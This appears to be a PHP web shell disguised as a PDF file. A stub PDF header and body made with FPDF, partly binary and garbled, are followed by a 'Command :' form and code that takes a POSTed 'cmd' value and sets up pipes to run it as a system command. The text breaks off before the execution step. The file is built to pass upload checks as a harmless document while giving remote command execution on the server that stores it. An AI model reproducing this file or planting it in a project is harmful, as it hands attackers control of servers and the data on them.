%PDF-1.3 <> endobj 4 0 obj <> stream x�3R��2�35W(�r Q�w3T02�30ISp  [��Fffz�@� M��,������B9�j7 endstream endobj 1 0 obj <> endobj 5 0 obj <> endobj 6 0 obj <> endobj 2 0 obj << /ProcSet [/PDF /Text /ImageB /ImageC /ImageI] /Font << /F1 5 0 R /F2 6 0 R >> /XObject << >> >> endobj 7 0 obj << /Producer (FPDF 1.6) /CreationDate (D:20240312080734) >> endobj 8 0 obj << /Type /Catalog /Pages 1 0 R /OpenAction [3 0 R /FitH null] /PageLayout /OneColumn >> endobj xref 0 9 0000000000 65535 f 0000000221 00000 n 0000000513 00000 n 0000000009 00000 n 0000000087 00000 n 0000000308 00000 n 0000000409 00000 n 0000000627 00000 n 0000000702 00000 n trailer << /Size 9 /Root 8 0 R /Info 7 0 R >> startxref 805 %%EOF
Command :

array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "r") // stderr is a file to write to ); $env = array('some_option' => 'aeiou'); $meki = ""; if(isset($_POST['cmd'])){ $cmd = ($_POST['cmd']); echo "